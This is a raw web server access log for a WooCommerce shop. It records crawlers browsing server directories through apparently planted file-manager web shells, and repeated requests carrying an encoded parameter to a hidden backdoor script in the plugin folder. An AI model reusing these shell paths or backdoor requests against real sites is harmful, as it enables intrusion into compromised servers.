216.73.216.122 - - [02/Aug/2026:01:36:08 +0200] "GET /sleepish/s0u2r3r0e0n4d4e8r535?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes HTTP/1.1" 200 12983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:11 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu2/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3401 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu2/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:11 +0200] "GET /shops/fervour/c0u1r7r3i5e4r23788?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata HTTP/1.1" 200 3326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:14 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu0/subsystem/drivers/processor/cpu0/driver HTTP/1.1" 200 3397 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu0/subsystem/drivers/processor/cpu0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:14 +0200] "GET /shops/tessellate/w0e4l1l0s9e1e6n3885?path=%2Fvar%2Fwww HTTP/1.1" 200 3902 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:17 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu1/driver/cpu1/subsystem/drivers/processor HTTP/1.1" 200 3402 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu1/driver/cpu1/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:17 +0200] "GET /bloody/p0i2e2i7n3g192840?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes%2Fcustomize HTTP/1.1" 200 4577 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.136.190.175 - - [02/Aug/2026:01:33:56 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633303833362p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632373233362q6264383465616431616431653633643363623734333865356363393561353363222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:36:20 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu0/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu0/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:20 +0200] "GET /?x=s0h1a6m1p1o5o4i8n1g28 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:23 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu0/driver/cpu3/subsystem/drivers/processor HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory49/node0/cpu0/driver/cpu3/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:23 +0200] "GET /kobus/m0e1t5a9m1o3r4p9h8o3s0er?path=%2Fvar%2Fmail HTTP/1.1" 200 2754 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:26 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu2/driver/cpu0/subsystem/drivers/processor HTTP/1.1" 200 3404 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu2/driver/cpu0/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:26 +0200] "GET /shops/encyst/b0a3t9h6o1l5i7t2e726?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes HTTP/1.1" 200 12983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:01:36:29 +0200] "GET /shops/coadjutor/e0n3e3r8g0i3s4i9n2g7?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata HTTP/1.1" 200 3326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:29 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu2/driver/cpu2/subsystem/drivers/processor/cpu2 HTTP/1.1" 200 3621 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/cpu2/driver/cpu2/subsystem/drivers/processor" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:32 +0200] "GET /shops/pilchardus/p0e1r8i7s4c5o6p0i3c77?path=%2Fvar%2Fwww%2Fhtml HTTP/1.1" 200 2763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:32 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu1/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3404 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu1/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:35 +0200] "GET /shops/grogshop/c0o5m1m0i0s6s1a5r4y8?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Ftmp HTTP/1.1" 200 4396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:36 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu0/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu0/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:38 +0200] "GET /shops/loathsomely/r0e2a7r9d2o7r2s1e741?fileloc=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fxmlrpc.php&path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket HTTP/1.1" 200 4180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:39 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu0/driver/cpu3/subsystem/drivers/processor HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu0/driver/cpu3/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:34:19 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633303835392p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632373235392q3836383930643231326635633361356534353037653339313839306639376662222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:01:36:41 +0200] "GET /sleepish/s0u2r3r0e0n4d4e8r535?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-admin HTTP/1.1" 200 6684 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:42 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu2/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3402 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu2/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:44 +0200] "GET /shops/anomalum/g0u3i7n8e8s9s41155?path=%2Fvar%2Fcache%2Fdictionaries-common HTTP/1.1" 200 3387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:45 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu3/driver/cpu1/subsystem/drivers/processor HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu3/driver/cpu1/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:47 +0200] "GET /breeching/d0o2u7b4l5e1e3n2d5e0r5?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2F.tmb HTTP/1.1" 200 2798 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:48 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/cpu1/subsystem/drivers/processor/cpu2/driver HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/cpu1/subsystem/drivers/processor/cpu2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:50 +0200] "GET /shops/corporeality/c0o3n4t1i7n9g3e7n6c0e8?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata HTTP/1.1" 200 3326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:51 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu3/subsystem/drivers/processor/cpu3/driver HTTP/1.1" 200 3398 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu3/subsystem/drivers/processor/cpu3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:54 +0200] "GET /shops/suprascalpular/t0u1p6a3i2395760?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store HTTP/1.1" 200 3820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:54 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu0/subsystem/drivers/processor/cpu3/driver HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu0/subsystem/drivers/processor/cpu3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:36:57 +0200] "GET /shops/abovementioned/c0o2u9n6t4e1r0f1e0i1ting?path=%2Fvar%2Fwww HTTP/1.1" 200 3902 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:36:58 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu3/driver/cpu0/subsystem/drivers/processor HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu3/driver/cpu0/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:00 +0200] "GET /shops/imploration/w0r1o4n0g3e3r45976?path=%2Fvar%2Fwww%2Foutfitbd_sto_usr HTTP/1.1" 200 2772 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu2/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3402 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu2/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:34:42 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633303838322p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632373238322q3830333061316461316536623831363961633534623134383930616635396665222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:01:37:03 +0200] "GET /shops/anomalum/g0u3i7n8e8s9s41155?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes%2Fabilities-api HTTP/1.1" 200 3292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:04 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/driver/cpu1/subsystem/drivers/processor HTTP/1.1" 200 3402 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/driver/cpu1/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:06 +0200] "GET /stumming/c0o8r5a1l2w5o4o0d60?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-admin HTTP/1.1" 200 6684 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:07 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu0/subsystem/drivers/processor/cpu1/driver HTTP/1.1" 200 3400 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu0/subsystem/drivers/processor/cpu1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:09 +0200] "GET /shops/rockrose/c0h2e3l5o2i6d26559?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fcgi-bin HTTP/1.1" 200 3138 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:10 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu0/driver/cpu3/subsystem/drivers/processor HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu0/driver/cpu3/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:12 +0200] "GET /?x=c0e1p4h5a9l3o8p9h7u3s4 HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:13 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu3/subsystem/drivers/processor/cpu2/driver HTTP/1.1" 200 3404 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu3/subsystem/drivers/processor/cpu2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:15 +0200] "GET /shops/grogshop/c0o5m1m0i0s6s1a5r4y8?path=%2F HTTP/1.1" 200 3698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:16 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu1/driver/cpu2/subsystem/drivers/processor HTTP/1.1" 200 3407 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/cpu1/driver/cpu2/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:18 +0200] "GET /shops/actaeifolium/k0a8r7a8t7e36966?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fcgi-bin HTTP/1.1" 200 3138 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:19 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu3/driver/cpu0/subsystem/drivers/processor HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/cpu3/driver/cpu0/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:21 +0200] "GET /shops/expurgatorius/l0a2r0o1i0d549762?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww HTTP/1.1" 200 3022 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:22 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu0/driver/cpu3/subsystem/drivers/processor HTTP/1.1" 200 3404 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/cpu0/driver/cpu3/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:24 +0200] "GET /shops/expurgatorius/l0a2r0o1i0d549762?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes HTTP/1.1" 200 12983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:25 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/subsystem/drivers/processor/cpu2/driver HTTP/1.1" 200 3404 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/subsystem/drivers/processor/cpu2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:35:04 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633303930342p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632373330342q3037336635646438376438656537303735326666663235633039373133316562222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:01:37:27 +0200] "GET /?x=s0t4u1m7b6l6i5n0g4s5t6one HTTP/1.1" 200 4506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:29 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/driver/cpu3/subsystem/drivers/processor HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/cpu1/driver/cpu3/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:30 +0200] "GET /kobus/m0e1t5a9m1o3r4p9h8o3s0er?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-includes%2Fabilities-api HTTP/1.1" 200 3292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:32 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu3/driver/cpu0/subsystem/drivers/processor/cpu1 HTTP/1.1" 200 3627 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/cpu3/driver/cpu0/subsystem/drivers/processor" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:33 +0200] "GET /irremediable/d0i4a8l4e4c1t3i9c5a5lly?path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fcgi-bin HTTP/1.1" 200 3138 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:35 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu1/subsystem/drivers/processor/cpu3/driver HTTP/1.1" 200 3403 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory65/node0/cpu1/subsystem/drivers/processor/cpu3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:37:37 +0200] "GET /shops/paneling/b0a1k2e6d2m0e4a4t797?fileloc=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-trackback.php&path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket HTTP/1.1" 200 4658 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:37:38 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu3/driver/cpu0/subsystem/drivers/processor HTTP/1.1" 200 3405 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory56/node0/cpu3/driver/cpu0/subsystem/drivers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
